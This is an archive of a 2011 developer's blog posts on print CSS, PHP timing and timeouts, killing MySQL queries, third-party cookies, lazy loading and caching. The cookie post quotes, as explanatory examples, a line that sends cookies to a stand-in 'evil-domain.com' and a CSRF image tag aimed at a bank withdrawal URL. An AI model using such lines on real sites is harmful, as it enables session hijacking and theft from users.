Sunday, December 11, 2011

check before going to print a web page

Recently we launched online forms product where students can apply for courses in various institutes individually and can pay forms fees, submit documents etc. Here we encountered with  printing web page functionality. It behaves differently across browsers and sometimes forms layout is not same as form shown in web page. However team is working on that , i searched in google and  find out to know root causes.


1. Avoid printing web page, best is to provide pdf for same as earlier we did for sums invoices reports.


2. Lets look below points which generally we follow if we plan to print web page.


General print styles tips to use to get better print outs 



/* Print styles */
@media print 
{
    tr, td, th {page-break-inside:avoid}
    thead {display:table-header-group}
    .NoPrint {visibility:hidden; display:none}
    a {color:#000000}
}



  1. The top one prevents page breaks inside of a table row
  2. The thead style makes any rows in the thead tag repeat for each page that the table spans across.
  3. NoPrint is a class I use to show something on the screen, but not in print.
  4. And, I like to turn off link colors.

Use separate CSS for print.

<LINK rel="stylesheet" type"text/css" href="print.css" media="print">

There is another way also.

<STYLE type="text/css">
@media print {
   BODY {font-size: 10pt; line-height: 120%; background: white;}
}
@media screen {
   BODY {font-size: medium; line-height: 1em; background: silver;}
}
</STYLE>


So lets take an example of CSS where we shown two different versions for screen and media.


/* screen display styles */
BODY {color: silver; background: black;}
A:link {color: yellow; background: #333333; text-decoration: none;}
A:visited {color: white; background: #333333; text-decoration: none;}
A:active {color: black; background: white; text-decoration: none;}
H1, H2, H3 {color: #CCCCCC; background: black; padding-bottom: 1px;
    border-bottom: 1px solid gray;}
Here is page for same.


And for printing purpose.

/* print styles */
BODY {color: black; background: white;}
A:link, A:visited {background: white; color: black; text-decoration: underline;
   font-weight: bold;}
H1, H2, H3 {background: white; color: black; padding-bottom: 1px;
   border-bottom: 1px solid gray;}
DIV.adbanner {display: none;}
check page here.

There are some other points like margin, float, hyperlink etc causes printing effect. So here is common CSS for printing.

body {
   background: white;
   font-size: 12pt;
   }
#menu {
   display: none;
   }
#wrapper, #content {
   width: auto;
   margin: 0 5%;
   padding: 0;
   border: 0;
   float: none !important;
   color: black;
   background: transparent none;
   }
div#content {
   margin-left: 10%;
   padding-top: 1em;
   border-top: 1px solid #930;
   }
div#mast {
   margin-bottom: -8px;
   }
div#mast img {
   vertical-align: bottom;
   }
a:link, a:visited {
   color: #520;
   background: transparent;
   font-weight: bold;
   text-decoration: underline;
   }
#content a:link:after, #content a:visited:after {
   content: " (" attr(href) ") ";
   font-size: 90%;
   }
#content a[href^="/"]:after {
   content: " (http://www.shiksha.com" attr(href) ") ";
   }
Hope it will be helpful.








Sunday, November 13, 2011

Is microtime enough to get consumed time in software application


I heard that few engineers are debating on to find out actual time consumption in profile page and specially accuracy in php micortime. A sort of benchmarking that tells how much CPU utilization were involved in new peaces of code.

We live in a time of multi-tasking,multi processors and background processing. So debating on microtime or cpu usages is worthless if you are working for web application. Each and every measurement and benchmarking is required to make robust and reliable application.

Lets back to system time,wall time debate.

Open a browser for one hour doesn’t mean that computer has spent an hour of dedicating it’s resources to the browser.(unless it’s IE of course…:P)

Also its depend on application. APC,memcached,varnish,gearman,cassandra etc can divert the result to benchmark application as well as estimated results.

There are three different types of times which was taken by application.

1. System time(processor spends on behalf of the current process)
2. User time (time spend in executing code in user mode)
3. Wall time (Amount of time that passes on our wall clock while process runs)

The advantage of system time is it will give the amount of time that any subproccesses right down to the low lever system processes (ie. file i/o, socket operations) take. This can also be a
disadvantage though because it may make it harder to determine if a bottleneck is happening in your code or in some sub-system your code uses.

getrusage() information is CPU time used and microtime() is wall clock time. The program may run for 10 minutes according to the clock on the wall, but internally may only use a few seconds of CPU
time. Then there's contending for CPU time with all the background programs running on the system, resource contention, plus regular housekeeping.

There's far too many factors involved to be able to get an accurate timing for such short periods. Doing three runs of the while(microtime()) version of loop, I got the following timings:

user: 0.98, 0.09, 0.90 sys: 0.12, 0.05, 0.94

Obviously quite the variance. Even just a simple has utime/stimes ranging from 0 to 0.03.

Try running application longer periods, and do something within them to increase cpu usage.

API in PHP to check server Load
// make sure safe mode shud be off

function ServerLoad()
{
    $stats = exec('uptime');
    preg_match('/averages?: ([0-9.]+),[s]+([0-9.]+),[s]+([0-9.]+)/', $stats, $regs);
    return ($regs[1].', '.$regs[2].', '.$regs[3]);
}

Happy Coding !!! Enjoy !

I wanna exit from a user defined php function if it takes longer time than expected


I think this is common problem that we suffered in our applications. There are many activity in application which took longer time, its shown bad user experience as well as sometime its thrown unexpected errors
like blank page etc.

In php there is no way to judge this thing unless your code is written in multi processing manner.

Let's look on function signature.

function downloadCSV(activityid)
{
1. is logged-in user (user has proper credits and authenticate user again)
2. RPC to get activity detail (activity is marked as pending/done/in progress etc)
3. RPC to get userids as result from activityid
4. RPC to get user details
5. Make CSV
6. detact credits from user account and update log tables in DB
7. download CSV
}

This API can fails in various steps.

1. network timeout/failure
2. DB was down
3. Server was down
4. RPC fails because as above reasons
5. Time out due to get user detail
6. DB server was hogged-up

Below i listed, what i figured out from Internet however there are other solutions too but i keep in mind to untouched existing code as less as possible.

1. Check HTTP code using curl

$httpCode = curl_getinfo($handle, CURLINFO_HTTP_CODE);
if($httpCode == 404) {
/* Handle 404 here. */
}

2.  Using curl to set time out time

curl_setopt($curl, CURLOPT_TIMEOUT, 2);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 2);

3. Provide socket time out settings

ini_set('default_socket_timeout', 10);
$url = "http://example.com/";
if( file_get_contents( urlencode($url) ) === false ) {
   // failure
} else {
   // success
}

4. Using PHP's stream_set_timeout settings
stream_set_timeout($obj, 2);

Another approaches are forking your code in such manner that it divides in different threads then we can set a timer that will exit after some configurable value.


design components of distributed application architecture


Its requires time to discuss in details, however this post is in draft state but i figured out 6 important layers in architecture. Please go thrugh and feel free suggest if you have any better suggestions.


  1. Create a web service with something like Apache Axis
  2. Use an ESB - something like Mule or JBoss
  3. Use a simple web Servlet on the server, and submit data using HTTP POST. You could use a simple embeddable Java web server like Jetty to do this.
  4. Use a messaging protocol like Kryonet or Google's protocol buffers
  5. Use a more general network application framework such as Netty

Sunday, November 6, 2011

funny programming terms that we share in workplace


I have maintained a list. Please feel free add.

Chindi

It mean cheap-less code but it works well.

Cha-gai

Impressive code that was written in very short time.

Chamka

Things are properly understandable.

Quantum bug

The bug that fails to occur when trying to observe it (ie tracing through code a line at a time).

Code Monkey

An insulting term to describe a poor programmer, usually who does not grasp basic or common programming concepts, and sometimes whose best coding capabilities can be described as "GoogleCut&Paste".

Ghost Bug.

Referring to a bug that cannot be reproduced in controllable conditions, a bug that seams to have appeared but no one is sure about it. A bug that requires voodoo for fixing. A bug
that drives a developer to think that a mutex should be used in a single threaded app.

Hackfactoring

The process of taking code and refactoring it without consequence to make it do what management demands that the code do.

Faith based programming

When "Jimmy", instead of using a more.. "scientific" approach to problem solving, just randomly delete, comment or rename a variable/line of code and prays for it for compile/runs.

Pixie Dust

A "tool" used by developers to "magically" fix certain issues via abnormal/illogical/unexplained means. (coined by the leader of our support team) When an issue completely baffles the
development team we are "out of pixie dust".

A**hole Features

Features that are thought of during release planning that add little to no actual value to the software.

Fragile

To use Agile methodologies and have people totally screwing it up.

Hi-driven development

When you debug your program by writing alert('Hi') statements in a trial-and-error fashion

Disaster Driven Development

When Your PMs and salesmen promised that You will build "space shuttle" in one month.

Hope Driven Development

A software development technique in which an application is developed in a long unplanned development cycle, with minimal "Steve Irwin-style testing", all with the hope that
everything will work as intended when released.

Different kinds of bug reports:

Smug Report - a bug submitted by a user who thinks he knows a lot more about the system's design than he really does. Filled with irrelevant technical details and one or more suggestions (always
wrong) about what he thinks is causing the problem and how we should fix it.

Drug Report - a report so utterly incomprehensible that whoever submitted it must have been smoking crack. The lesser version is a chug report, where the submitter is thought to have had one too many.

Shrug Report - a bug report with no error message or repro steps and only a vague description of the problem. Usually contains the phrase "doesn't work."

Refuctoring

The process of taking a well-designed piece of code and, through a series of small, reversible changes, making it completely unmaintainable by anyone except yourself.

Heisenbug

Can't take credit for this, but it is awesome!
A computer bug that disappears or alters its characteristics when an attempt is made to study it.

Hindenbug

A catastrophic data destroying bug - "Oh the humanity!"

Counterbug

A bug you present when presented with a bug caused by the person presenting the bug

Bloombug

A bug that accidentally generates money (just did this one)

Fear Driven Development

When project management adds more pressure (fires someone or something).

Common Law Feature

A bug in the application that has existed so long that it is now part of the expected functionality, and user support is required to actually fix it.


Hydra Code

Code that cannot be fixed. One fix causes two new bugs.It should be rewritten.

Protoduction

A prototype that ends up in production.

Ninja comments

Also known as invisible comments, secret comments, or no comments.

Chunky salsa

Based on the chunky salsa rule, a single critical error or bug that renders an entire system unusable, especially in a production environment.

Rubberducking

Sometimes, you just have to talk a problem out. I used to go to my boss and talk about something and he'd listen and then I'd just answer my own question and walk out without him saying a thing.

I read about someone that put a rubber duck on their monitor so they could talk to it, so rubberducking is talking your way through a problem.

Databasically

"Hey, I'll put all of our customers into a Word document and then we can X." "No, we should do that database-ically so that we can keep that list up to date."

Hooker Code


Code that is problematic and causes application instability (application "goes down" often).

Friday, September 23, 2011

how kill multiple locked queries in mysql

There are two ways actually. one is if in your mysql information_schema database have processlist table
and second one is simple shell script.

If information_schema.processlist exist.

mysql> select concat('KILL ',id,';') from information_schema.processlist where user='root' into outfile '/tmp/a.txt';
Query OK, 2 rows affected (0.00 sec)

mysql> source /tmp/a.txt;
Query OK, 0 rows affected (0.00 sec)

If information_schema.processlist doesn’t exist on your version of MySQL, this will work.

#!/bin/bash
for each in `mysqladmin -u user -ppassword processlist | awk '{print $2, $4, $8}' | grep mailer | grep shiksha | awk '{print $1}'`;
do mysqladmin -u root -ppassword kill $each;
done

Wednesday, September 21, 2011

web based business development and node js

I really shocked when i install node js and run few test scripts. it's tremendous and powerful and gives wings to do anything. we can build chat server in few minutes ... can build web server,TCP/IP service,Message Queues,DB connections etc. 


Main advantages are:



  1. Web development in a dynamic language (JavaScript) on a VM that is incredibly fast (V8). It is much faster than Ruby, Python,PHP or Perl.
  2. Ability to handle thousands of concurrent connections with minimal overhead on a single process.
  3. JavaScript is perfect for event loops with first class function objects and closures. People already know how to use it this way having used it in the browser to respond to user initiated events.
  4. A lot of people already know JavaScript, even people who do not claim to be programmers. It is arguably the most popular programming language.
  5. Using JavaScript on a web server as well as the browser reduces the impedance mismatch between the two programming environments which can communicate data structures via JSON that work the same on both sides of the equation. Duplicate form validation code can be shared between server and client, etc.
 While i am elaborating things , will share few more things with screen shots. which might be intrested to you people to understand magic of NODE JS.

Thursday, September 15, 2011

demo code to test third party cookie

Hi Folks,

Here i am sharing code snippets that i use to test and understand cookie. Specially third party cookie.

What i did ?
Actually i create two sub domains www.local-dom1.com and www.local-dom2.com.
then i tried set cookie across domains.

How i did it ?
I wrote php code which set cookie and then convert out header as image with content. and then use IMG html tag with src that PHP script.

PHP code:


<?php

/* The next four values may be changed. */
$CookieName = "mycookie";    // Cookie's name
$CookieValue = "hello Ravi"; // Cookie's value
$CookieDirectory = "/";        // Cookie directory ("/" for all directories)
$DaysCookieShallLast = 31;     // Days before expiration (decimal number okay.)
/*********************************************************************/
$CookieDomain = 'www.local-dom1.com';
$lasting = ($DaysCookieShallLast<=0) ? "" : time()+($DaysCookieShallLast*24*60*60);
setcookie($CookieName,$CookieValue,$lasting,$CookieDirectory,$CookieDomain);
$image = "R0lGODlhBQAFAJH/AP///wAAAMDAwAAAACH5BAEAAAIALAAAAAAFAAUAAAIElI+pWAA7n";
header('Content-type: image/gif');
echo base64_decode($image);
exit;
?>

HTML Code at local-demo2.com:


<img
   src="http://www.local-dom1.com/public/setcookie.php"
   width="1"
   height="1"
   border="0"
   alt="cookie">
<script>

function getCookie(c_name)
{
var i,x,y,ARRcookies=document.cookie.split(";");
for (i=0;i<ARRcookies.length;i++)
{
  x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));
  y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);
  x=x.replace(/^s+|s+$/g,"");
  if (x==c_name)
    {
    return unescape(y);
    }
  }
}
alert(getCookie('mycookie'));
</script>
<?php echo $_COOKIE["mycookie"]; ?>

Hope code will be helpful to understand what i said in my previous post.

Happy coding !!!

Monday, September 12, 2011

cross domain cookie,third party cookie and cross site ajax facts and myths

There are few questions in my mind which need appropriate & correct answers...
  1. it's possible to set a cookies to another domain with javascript
  2. Ajax Cross Domain Calls or making cross-sub-domain ajax (XHR) requests
  3. How Open social works
In below lines i am discussing each one by one but i request that please feel free post your comments if you feel any correction here or have some queries or comments.


we know about basic of cookie http://ravirajsblog.blogspot.com/2010/11/abc-of-http-cookie-detailed-look.html and some typical PHP session issue http://ravirajsblog.blogspot.com/2010/06/php-session-issue.html


Actually there are some security concerns in cross domain communications even server side languages also need some settings when communicate cross server
(http://php.net/manual/en/filesystem.configuration.php)
main concern is Cookie stealing and XSS(http://ha.ckers.org/xss.html) & Cross-site request forgery (CSRF). CSFR generally now avoided by filtering user input otherwise such type things occurs.


<img src="http://bank.example/withdraw?account=raviraj&amount=1000000000&for=bob"> 


Anyway come back to Cookie stealing.
Cookies are sent in plain text over the Internet, making them vulnerable to packet sniffing whereby someone intercepts traffic between a computer and the Internet. Once the value of a user’s login cookie is taken, it can be used to simulate the same session elsewhere by manually setting the cookie. The server can’t tell the difference between the original cookie that was set and the duplicated one that was stolen through packet sniffing, so it acts as if the user had logged in. This type of attack is called session hijacking.


A script from loaded another domain will get that page’s cookies by reading document.cookie.


As an example of how dangerous this is, suppose I load a script from evil-domain.com that contains some actually useful code. However, the folks at evil-domain.com then switch that code to the following:


(new Image()).src = "http://www.evil-domain.com/cookiestealer.php?cookie=" + cookie.domain;


Now this code is loaded on my page and silently sends my cookies back to evil-domain.com. This happens to everyone who visits my site. Once they have my cookies, it’s much easier to perpetrate other attacks including session hijacking.


There are a few ways to prevent session hijacking using cookies.


The first, and most common technique among the security-conscious, is to only send cookies over SSL. Since SSL encrypts the request on the browser before transmitting across the Internet, packet sniffing alone can’t be used to identify the cookie value. Banks and stores use this technique frequently since user sessions are typically short in duration.


Another technique is to generate a session key in some random fashion and/or a way that is based on information about the user (username, IP address, time of login, etc.). This makes it more difficult to reuse a session key, though doesn’t make it impossible.


Yet another technique is to re-validate the user before performing an activity deemed to be of a higher security level, such as transferring money or completing a purchase. For example, many sites require you to log in a second time before changing a password etc.


So finally all browsers decide to follow "same origin policy" concept.


Same origin policy is an important security concept for a number of browser-side programming languages, such as JavaScript. The policy permits scripts running on pages originating from the same site to access each other's methods and properties with no specific restrictions, but prevents access to most methods and properties across pages on different sites.This mechanism bears a particular significance for modern web applications that extensively depend on HTTP cookies to maintain authenticated user sessions, as servers act based on the HTTP cookie information to reveal sensitive information or take state-changing actions.A strict separation between content provided by unrelated sites must be maintained on client side to prevent the loss of data confidentiality or integrity.
But the behavior of same-origin checks and related mechanisms is not well-defined in a number of corner cases, such as for protocols that do not have a clearly defined host name or port associated with their URLs.


Well, the confusion comes when you start talking about first party and third party cookies and how they are treated differently by web browsers.


A first party cookie is a cookie that is given to the website visitor by the same domain (www.domain.com) that the web page resides on. Whereas, a third party cookie is one that is issued to the website visitor by a web server that is not on the same domain as the website.


Web pages allow inclusion of resources from anyplace on the web. For example, many site uses the YUI CSS foundation for its layout and therefore includes these files from the Yahoo! CDN at yui.yahooapis.com via a <link> tag. Due to cookie restrictions, the request to retrieve this CSS resource will not include the cookies for ravirajsblog.blogspot.com. However, yui.yahooapis.com could potentially return its own cookies with the response (it doesn’t, it’s a cookie-less server). The page at ravirajsblog.blogspot.com cannot access cookies that were sent by yui.yahooapis.com because the domain is different and vice-verse, but all the cookies still exist. In this case, yui.yahooapis.com would be setting a third-party cookie, which is a cookie tied to a domain separate from the containing page.


There are several ways to include resources from other domains in HTML:

  1. Using a <link> tag to include a style sheet.
  2. Using a <script> tag to include a JavaScript file.
  3. Using an <object> or <embed> tag to include media files.
  4. Using an <iframe> tag to include another HTML file.

In each case, an external file is referenced and can therefore return its own cookies. The interesting part is that with the request, these third-party servers receive an HTTP Referer heading (spelling is incorrect in the spec) indicating the page that is requesting the resource. The server could potentially use that information to issue a specific cookie identifying the referring page. If that same resource is then loaded from another page, the cookie would then be sent along with the request and the server can determine that someone who visited Site A also visited Site B. This is a common practice in online advertising. Such cookies are often called tracking cookies since their job is to track user movement from site to site. This isn’t actually a security threat but is an important concept to understand in the larger security discussion.
Generally third party cookies are issued for banner advertiser who places a number of banners on your site and wants to know how many times it has been requested, or it could be a third party hosted analytics vendor that issues a page tag for each of your pages that forces a cookie on your site.
In the last situation, where an analytics vendor issues a cookie through a page tag the cookie is seen as a third party cookie because it is being generated by the analytics server which is having the tracking 1×1 invisible gif image requested from it by the page tag. It is however possible to have an analytics cookie issued by the third party vendor but still look like a first party cookie.
There are 2 ways of achieving this:-
Create a DNS alias for third party analytics server so that it looks like it is actually part of your domain and so anything issued by this server because 1st party (including cookies)
Have the Javascript page tag create a cookie at run-time and then pass the cookie value back to the analytics server so the cookie is created within the page and so becomes a 1st party cookie.
The obvious advantage of the DNS alias option is that you can have a smaller page tag which is quicker to load, however the cookie making page tag has an advantage over the DNS alias because no structural changes need to be made to the site’s infrastructure and the implementation of the tag should be more straight forward. checkout how GA works in cross domain specially for e-commerce.
http://cutroni.com/blog/2006/06/25/how-google-analytics-tracks-third-party-domains/


Back to our questions. Answer of first one is:
Nope, that will not work for security reasons.You cannot do that with cookies alone.They are set explicitly per-domain, and there isn't a legitimate (read: "non-exploit") way to set them for another domain.However,if you control both servers, it may be possible to use some workarounds/hacks to achieve this, but pretty it isn't, and it may break unexpectedly.


Let's see how oauth works. using same technique we can achieve our goal.[ see the Anonymous guy's comments, how nicely he/she decribed flow.]


Approach designates one domain as the 'central' domain and any others as 'satellite' domains.
When someone clicks a 'sign in' link (or presents a persistent login cookie), the sign in form ultimately sends its data to a URL that is on the central domain, along with a hidden form element saying which domain it came from (just for convenience, so the user is redirected back afterwards).
This page at the central domain then proceeds to set a session cookie (if the login went well) and redirect back to whatever domain the user logged in from, with a specially generated token in the URL which is unique for that session.
The page at the satellite URL then checks that token to see if it does correspond to a token that was generated for a session, and if so, it redirects to itself without the token, and sets a local cookie. Now that satellite domain has a session cookie as well. This redirect clears the token from the URL, so that it is unlikely that the user or any crawler will record the URL containing that token (although if they did, it shouldn't matter, the token can be a single-use token).
Now, the user has a session cookie at both the central domain and the satellite domain. But what if they visit another satellite? Well, normally, they would appear to the satellite as unauthenticated.
However, throughout application, whenever a user is in a valid session, all links to pages on the other satellite domains have a ?s or &s appended to them. I reserve this 's' query string to mean "check with the central server because we reckon this user has a session". That is, no token or session id is shown on any HTML page, only the letter 's' which cannot identify someone.
A URL receiving such an 's' query tag will, if there is no valid session yet, do a redirect to the central domain saying "can you tell me who this is?" by putting something in the query string.
When the user arrives at the central server, if they are authenticated there the central server will simply receive their session cookie. It will then send the user back to the satellite with another single use token, which the satellite will treat just as a satellite would after logging in (see above). Ie, the satellite will now set up a session cookie on that domain, and redirect to itself to remove the token from the query string.
This solution works without script, or iframe support. It does require '?s' to be added to any cross-domain URLs where the user may not yet have a cookie at that URL. I think this is possible one approach how we logged in in gmail when we already browsing orkut as registered user.


So we disappointed in first answer!! don't worry let's look for second one .. i am trying my best to say yes however ;-)


Answer for second one is NO... This restriction comes because of the same origin policy and even sub-domain ajax calls are not allowed.


By enabling mod_proxy module of apache2, we can configure apache in reverse proxy mode. In reverse proxy mode, apache2 appears be like an ordinary web server to the browser. However depending upon the proxy rules defined, apache2 can make cross-domain request and serve data back to the browser.


Another method of achieving sub-domain ajax requests is by using iframes. However, javascript does not allow communication between two frames if they don’t have same document.domain. The simplest of the hacks to make this communication possible is to set document.domain of the iframe same as that of the parent frame.


The second method deals with cases when you want to fetch data from a sub-domain. You can’t make an ajax call directly from the parent page, hence you do it through iframes.Consider case of facebook chat. If you see in firebug all chat related ajax are sent to channel.facebook.com which is achieved by iframe approch.


Few hacky open sourses also avalble like http://remysharp.com/2007/10/08/what-is-jsonp/


Now come to last question, how open social works ?
This is big topic which need brief detail. so many components are which we need to understand before looking open social like  Shindig,Gadget Server,RPC,REST,container server,container application etc
Here is good link to know more about open soical
That's it for now. Cheers!!!

Tuesday, June 28, 2011

Things that i want from my Team

We have seen so many articles on ideal team or how be a good leader etc. To be a good team player there are few areas where we need to overlook and judge. long term goal, effective team work,decision making approach and use it consistently etc there are so many things on that we can discuss. As per my role , as a software development team, i am looking on following aspects from my team.


  1. Hire smart, fast, flexible engineers who are willing to do any type of work, and are excited to learn new technologies. do not need "architects".If you design something, your code it, and if you code it you test it. Engineers who do not like to go outside their comfort zone, or who feel certain work is "beneath" them will simply get in the way.
  2. It is better to deliver 20 projects with 10 bugs and miss 5 projects by two days than to deliver 10 projects that are all perfect and on time. 
  3. Everyone who works, will make a number of mistakes the first few months, and will continue to occasionally do so over time. The important thing is how much you have learned and to not make the same mistakes over and over again.
  4. Keep designs simple and focused on the near term business needs - do not design too far ahead.
  5. When one person owns everything (CSS, JS, PHP, SQL, scripting), there is no waiting, bottlenecks, scheduling conflicts, management overhead, or distribution of "ownership". More projects/people can be added in a modular way without affecting everyone else.  
  6. The programmer is supposed to deliver the product with a reasonable quality.reasonable quality being a term that should be defined when taking the job.at last , you should work to get the software in good enough shape to be delivered.
  7. No software is bug-free.The developer himself is never the best tester. That is why steps of QA are always necessary. The testers that blame you should be happy to have found the defects before a end customer did. Of course there is still poor programming or poor design but also poor testing... The world is not perfect but we have to cope with all these things in an appropriate way. Using even tighter software development processes if the software you develop is used in a medical or military environment for example. If all tools for software quality were used i.e. Design,Static code checking, peer code reviews, unit testing, component testing, system tests etc ... nobody should be blamed.

TODO:- Still in draft state. Please put your valuable comments so that i can complete it :-)

Sunday, May 1, 2011

Lazy Load techniques .. another one hack ..

We have already seen few lazy load techniques here and here.  If we have large set of HTML , it takes so much time to load page.


Here is a trick that allows you to bundle all of your modules into a single resource without having to parse any of the JavaScript. Of course, with this strategy, there is greater latency with the initial download of the single resource (since it has all your JavaScript modules), but once the resource is stored in the browser's application cache, this issue becomes much less of a factor.

To combine all modules into a single resource, we wrote each module into a separate script tag and hide the code inside a comment block (/* */). When the resource first loads, none of the code is parsed since it is commented out. To load a module, find the DOM element for the corresponding script tag, strip out the comment block, and eval() the code. If the web app supports XHTML, this trick is even more elegant as the modules can be hidden inside a CDATA tag instead of a script tag. An added bonus is the ability to lazy load your modules synchronously since there's no longer a need to fetch the modules asynchronously over the network.

200k of JavaScript held within a block comment adds 240ms during page load, whereas 200k of JavaScript that is parsed during page load added 2600 ms. That's more than a 10x reduction in startup latency by eliminating 200k of unneeded JavaScript during page load! Take a look at the code sample below to see how this is done.



<html>
...
<script id="lazy">
// Make sure you strip out (or replace) comment blocks in your JavaScript first.
/*
JavaScript of lazy module
*/
</script>

<script>
  function lazyLoad() {
    var lazyElement = document.getElementById('lazy');
    var lazyElementBody = lazyElement.innerHTML;
    var jsCode = stripOutCommentBlock(lazyElementBody);
    eval(jsCode);
  }
</script>

<div onclick=lazyLoad()> Lazy Load </div>
</html>

File based caching on high traffic website

If you have a lot of traffic, and you’re caching a page for an hour… Over the course of one hour, you may read the file possibly 200 times, and write just once… The time taken to write is minimal, around 10ms? - So, out of one hour, you have 10ms ‘downtime’ for your cache reads.

Which is 0.00027% downtime… Extremely minimal, and not really worth worrying about.
Locks will only cause this fractional locking time, and, if it only effects 2 people trying to write at the same time.

The correct way to work around it is explained here:-

* 1 page is cached for an hour.
* When that cache expires, 2 people visit the site with 10ms of each other (the only time this will cause an ‘issue’, because otherwise, the first will have written the cache before the second requests the page).
* The first user ‘reads’ the cache file, sees it’s expired so begins rendering the page normally with PHP/MySQL
* The second user has the same thing going on… the cache hasn’t been updated by the second user.
* The first user finishes building the page, and begins writing the file, locking it.
* The second user also finishes building the page, and attempts to write it.
* Because the first user has locked the file, the second user can’t write it…
* This is a problem for the second user, so you simply build a little fix to make it all work like magic.

If the second user can’t write the the cache (because it is locked), simply echo the contents of the rendered page, not saving it to the cache.
The first user is dealing with the cache, so just render the output.

With Codegniter, this is how it works…

Line 299 of Output.php:-


if ( ! $fp = @fopen($cache_path, 'wb'))
        {
            log_message('error', "Unable to write cache file: ".$cache_path);
            return;
        }

The cache file is only written if it’s ‘really_writable’ (not locked)

Line 59 of Output.php:


elseif (($fp = @fopen($file, 'ab')) === FALSE)
    {
        return FALSE;


So… if we cant write it, just render the second users’ request.

Simple, and it works, beautifully... :-)

Tuesday, March 1, 2011

developer or team lead : pure development role to team leadership role

Few months ago, my role was evolving in pure development.My day used to be pure coding.I had generally enjoying it. Since last few months my job responsibilities are changed from developer to team lead.Now, I still have a largely full plate of coding duties, but few others are added in my duties like I'm expected to mentor other developers,work on requirements, make design decisions for other developers, evaluate bug reports from users, assign them to developers,team communication etc.
I find that my day has become on interruption after another and the prolonged periods of sustained concentration needed to get any actual quality coding done are becoming rarer and rarer.
As an individually-contributing developer, my job was to turn my own time in to software that the business could sell for a profit.

As a team lead, my job is to see that the team effectively turns their time in to software that the business could sell for a profit.
Some things fundamentally change when your perspective changes like that. These things have become much more important:-
  • Keeping other members of the team in a state that they can be productive
  • Delegating tasks to the least loaded team member
  • Strategically choosing which developer needs to learn which new skill to better load-balance the team, and investing some degree of my time in helping them learn that skill
  • Effectively communicating requirements (somebody told "Think twice before you start programming or you will program twice before you start thinking")
Notice that "writing good code myself" is no longer on my list of top concerns. If the task of "develop this major new thing" falls on me, it's almost always for one of a few reasons:-
  • The new thing is a framework item that will enable the rest of the team to be more productive (thus keeping them in a productive state)
  • The thing I'm working on is super-critical for customer satisfaction (usually that means it has to be done quickly and with little risk of failure)
  • The thing I'm working on has poorly-understood requirements, requiring someone with a high degree of domain knowledge to make quality requirement decisions while simultaneously doing development (one could argue that in this case, my inability to adequately form the requirements is the real shortcoming.)
  • helping the team most efficiently and effectively turn collective time in to software that the business can sell for a profit.
However it's debatable but i believe it will works well and rocking. willing to know what others thinking ?

"Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning."
– Rich Cook